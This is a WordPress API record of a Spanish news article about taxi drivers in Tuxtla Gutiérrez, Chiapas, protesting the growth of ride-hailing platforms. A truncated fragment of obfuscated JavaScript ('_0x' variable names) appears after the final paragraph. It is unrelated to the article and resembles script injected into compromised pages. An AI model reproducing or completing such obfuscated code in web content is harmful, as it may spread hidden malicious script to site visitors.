{"id":25637,"date":"2025-12-06T06:03:54","date_gmt":"2025-12-06T06:03:54","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25637"},"modified":"2025-12-06T06:03:55","modified_gmt":"2025-12-06T06:03:55","slug":"taxistas-exigen-equilibrio-en-el-transporte-de-chiapas-frente-al-crecimiento-de-plataformas-digitales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25637","title":{"rendered":"Taxistas exigen equilibrio en el transporte de Chiapas frente al crecimiento de plataformas digitales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"25638\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-1024x768.jpg\" alt=\"\" class=\"wp-image-25638\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/12\/1000476893-2048x1536.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>5 de diciembre del 2025. Tuxtla Guti\u00e9rrez, Chiapas. \u2013 Conductores del servicio de taxi concesionado realizaron una caravana pac\u00edfica este mi\u00e9rcoles, desde la Fuente Diana Cazadora hasta el Parque Central, para exigir al gobierno estatal medidas que regulen la operaci\u00f3n de las plataformas digitales de transporte, a las que acusan de competencia desleal.<\/p>\n\n\n\n<p>La movilizaci\u00f3n, integrada por entre 50 y 100 veh\u00edculos, tuvo como prop\u00f3sito principal solicitar la intervenci\u00f3n del gobernador Eduardo Ram\u00edrez para hacer cumplir acuerdos previos que, seg\u00fan los manifestantes, han sido ignorados. Denunciaron que en Chiapas operan m\u00e1s de 15 mil veh\u00edculos particulares bajo esquemas de plataforma, frente a apenas 5 mil 700 taxis con concesi\u00f3n vigente, lo que genera, a su juicio, una distorsi\u00f3n del mercado.<\/p>\n\n\n\n<p>Jorge Omar V\u00e1zquez, portavoz del movimiento, se\u00f1al\u00f3 que, si bien existe un amparo que protege a los operadores de plataformas, es necesario establecer un registro oficial y obligatorio que permita identificar a los conductores y cuantificar con precisi\u00f3n la flota en circulaci\u00f3n. \u201cExigimos que se regularice el sector, se aplique la ley y se nos garantice una competencia justa\u201d, afirm\u00f3 V\u00e1zquez.<\/p>\n\n\n\n<p>Aunque la protesta se centr\u00f3 en la demanda de equidad, los taxistas tambi\u00e9n reconocieron un avance significativo: su incorporaci\u00f3n a un programa de seguridad social que facilitar\u00e1 su afiliaci\u00f3n al IMSS, un logro que valoran como un paso positivo en el reconocimiento de sus derechos laborales.<\/p>\n\n\n\n<p>El conflicto forma parte de una discusi\u00f3n nacional sobre la convivencia entre el transporte tradicional y los nuevos modelos digitales, un debate que enfrenta la innovaci\u00f3n tecnol\u00f3gica con la regulaci\u00f3n, la protecci\u00f3n laboral y la planeaci\u00f3n urbana.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>5 de diciembre del 2025. Tuxtla Guti\u00e9rrez, Chiapas. \u2013 Conductores del servicio de taxi concesionado realizaron una caravana pac\u00edfica este mi\u00e9rcoles, desde la Fuente Diana Cazadora hasta el Parque Central, para exigir al gobierno estatal medidas que regulen la operaci\u00f3n de las plataformas digitales de transporte, a las que acusan de competencia desleal. La movilizaci\u00f3n, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25638,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-25637","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25637","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25637"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25637\/revisions"}],"predecessor-version":[{"id":25639,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25637\/revisions\/25639"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25638"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25637"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25637"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25637"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}